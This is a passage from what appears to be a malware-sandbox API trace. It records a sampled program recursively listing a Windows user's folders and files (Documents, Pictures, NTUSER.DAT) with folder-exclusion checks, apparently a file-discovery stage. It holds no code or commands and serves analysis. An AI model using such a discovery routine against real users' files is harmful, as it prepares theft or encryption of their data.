ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0029.131] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Documents", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0029.132] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889ee0, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9dd020c, nFileSizeHigh=0x33c5d2, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="᪀{jဓĩ\x10")) returned 0xffffffff [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="NetHood", cAlternateFileName="")) returned 1 [0029.132] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NetHood", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0029.132] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889eb0, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9dd020c, nFileSizeHigh=0x33c5fc, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="᪀{jဓĩ\x10")) returned 0xffffffff [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x6ae794, dwReserved1=0x777648, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x10, dwReserved1=0x777648, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x777648, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x777648, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0029.132] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f87c750, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f87c750, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Pictures", cAlternateFileName="")) returned 1 [0029.133] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0029.133] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f87c750, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f87c750, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.133] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f87c750, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f87c750, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.133] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x76997d50, ftLastWriteTime.dwHighDateTime=0x1d5c486, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 1 [0029.133] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x9572e040, ftLastWriteTime.dwHighDateTime=0x1d5bcd4, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x10, dwReserved1=0x777648, cFileName="AfpZd.png", cAlternateFileName="")) returned 1 [0029.133] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x38fb4360, ftLastWriteTime.dwHighDateTime=0x1d5c4a0, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x10, dwReserved1=0x777648, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 1 [0029.133] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.134] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0xae940c60, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x10, dwReserved1=0x777648, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 1 [0029.134] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x82d46af0, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 1 [0029.134] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a729d20, ftCreationTime.dwHighDateTime=0x1d5c541, ftLastAccessTime.dwLowDateTime=0x8784ee30, ftLastAccessTime.dwHighDateTime=0x1d5ba7a, ftLastWriteTime.dwLowDateTime=0x8784ee30, ftLastWriteTime.dwHighDateTime=0x1d5ba7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="oaCi", cAlternateFileName="")) returned 1 [0029.134] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi", cchCount1=4, lpString2="AppData", cchCount2=7) returned 3 [0029.134] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a729d20, ftCreationTime.dwHighDateTime=0x1d5c541, ftLastAccessTime.dwLowDateTime=0x8784ee30, ftLastAccessTime.dwHighDateTime=0x1d5ba7a, ftLastWriteTime.dwLowDateTime=0x8784ee30, ftLastWriteTime.dwHighDateTime=0x1d5ba7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.134] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a729d20, ftCreationTime.dwHighDateTime=0x1d5c541, ftLastAccessTime.dwLowDateTime=0x8784ee30, ftLastAccessTime.dwHighDateTime=0x1d5ba7a, ftLastWriteTime.dwLowDateTime=0x8784ee30, ftLastWriteTime.dwHighDateTime=0x1d5ba7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.134] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf879ae10, ftCreationTime.dwHighDateTime=0x1d5b65f, ftLastAccessTime.dwLowDateTime=0xf061e530, ftLastAccessTime.dwHighDateTime=0x1d5b8d5, ftLastWriteTime.dwLowDateTime=0xf061e530, ftLastWriteTime.dwHighDateTime=0x1d5b8d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="4hhX5h uJXBt", cAlternateFileName="4HHX5H~1")) returned 1 [0029.134] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf879ae10, ftCreationTime.dwHighDateTime=0x1d5b65f, ftLastAccessTime.dwLowDateTime=0xf061e530, ftLastAccessTime.dwHighDateTime=0x1d5b8d5, ftLastWriteTime.dwLowDateTime=0xf061e530, ftLastWriteTime.dwHighDateTime=0x1d5b8d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0029.135] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf879ae10, ftCreationTime.dwHighDateTime=0x1d5b65f, ftLastAccessTime.dwLowDateTime=0xf061e530, ftLastAccessTime.dwHighDateTime=0x1d5b8d5, ftLastWriteTime.dwLowDateTime=0xf061e530, ftLastWriteTime.dwHighDateTime=0x1d5b8d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x581778d0, ftCreationTime.dwHighDateTime=0x1d5bb87, ftLastAccessTime.dwLowDateTime=0x8ec87b40, ftLastAccessTime.dwHighDateTime=0x1d5b650, ftLastWriteTime.dwLowDateTime=0x8ec87b40, ftLastWriteTime.dwHighDateTime=0x1d5b650, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="A-rPtL9RGZL", cAlternateFileName="A-RPTL~1")) returned 1 [0029.135] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\*", lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x581778d0, ftCreationTime.dwHighDateTime=0x1d5bb87, ftLastAccessTime.dwLowDateTime=0x8ec87b40, ftLastAccessTime.dwHighDateTime=0x1d5b650, ftLastWriteTime.dwLowDateTime=0x8ec87b40, ftLastWriteTime.dwHighDateTime=0x1d5b650, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2380 [0029.135] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x581778d0, ftCreationTime.dwHighDateTime=0x1d5bb87, ftLastAccessTime.dwLowDateTime=0x8ec87b40, ftLastAccessTime.dwHighDateTime=0x1d5b650, ftLastWriteTime.dwLowDateTime=0x8ec87b40, ftLastWriteTime.dwHighDateTime=0x1d5b650, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x83e53da0, ftLastWriteTime.dwHighDateTime=0x1d5bbf8, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x508a5410, ftCreationTime.dwHighDateTime=0x1d5c22c, ftLastAccessTime.dwLowDateTime=0x5ae1f840, ftLastAccessTime.dwHighDateTime=0x1d5b599, ftLastWriteTime.dwLowDateTime=0x5ae1f840, ftLastWriteTime.dwHighDateTime=0x1d5b599, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="eQssAfKs-mGDt6Pjw", cAlternateFileName="EQSSAF~1")) returned 1 [0029.135] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\*", lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x508a5410, ftCreationTime.dwHighDateTime=0x1d5c22c, ftLastAccessTime.dwLowDateTime=0x5ae1f840, ftLastAccessTime.dwHighDateTime=0x1d5b599, ftLastWriteTime.dwLowDateTime=0x5ae1f840, ftLastWriteTime.dwHighDateTime=0x1d5b599, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2440 [0029.135] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x508a5410, ftCreationTime.dwHighDateTime=0x1d5c22c, ftLastAccessTime.dwLowDateTime=0x5ae1f840, ftLastAccessTime.dwHighDateTime=0x1d5b599, ftLastWriteTime.dwLowDateTime=0x5ae1f840, ftLastWriteTime.dwHighDateTime=0x1d5b599, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0xd82532f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x4, dwReserved1=0x777648, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x1e377b00, ftLastWriteTime.dwHighDateTime=0x1d5c2d6, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x7e736a90, ftLastWriteTime.dwHighDateTime=0x1d5ba54, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x10, dwReserved1=0x777648, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 1 [0029.135] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f309b90, ftCreationTime.dwHighDateTime=0x1d5bad4, ftLastAccessTime.dwLowDateTime=0x14b56b20, ftLastAccessTime.dwHighDateTime=0x1d5bea6, ftLastWriteTime.dwLowDateTime=0x14b56b20, ftLastWriteTime.dwHighDateTime=0x1d5bea6, nFileSizeHigh=0x0, nFileSizeLow=0x123cb, dwReserved0=0x10, dwReserved1=0x777648, cFileName="QZEtzxM.bmp", cAlternateFileName="")) returned 1 [0029.136] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x2ece4750, ftLastWriteTime.dwHighDateTime=0x1d5bbab, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 1 [0029.136] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x6caaa870, ftLastWriteTime.dwHighDateTime=0x1d5be12, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 1 [0029.136] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x1b60024, ftCreationTime.dwLowDateTime=0x36c3f1, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1980025, nFileSizeHigh=0x36c3f1, nFileSizeLow=0x37, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="?j\x08", cAlternateFileName="⑘{?jဓĩ\x10")) returned 0 [0029.136] FindClose (in: hFindFile=0x7c2440 | out: hFindFile=0x7c2440) returned 1 [0029.136] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x1940035, ftCreationTime.dwLowDateTime=0x36c409, ftCreationTime.dwHighDateTime=0x777648, ftLastAccessTime.dwLowDateTime=0x36c3f4, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x1336310, ftLastWriteTime.dwHighDateTime=0x17a0036, nFileSizeHigh=0x36c409, nFileSizeLow=0x777338, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="盈w\x08", cAlternateFileName="ℸ{?jဓĩ\x10")) returned 0 [0029.136] FindClose (in: hFindFile=0x7c2380 | out: hFindFile=0x7c2380) returned 1 [0029.148] FindNextFileW (in: hFindFile=0x7c22c0, 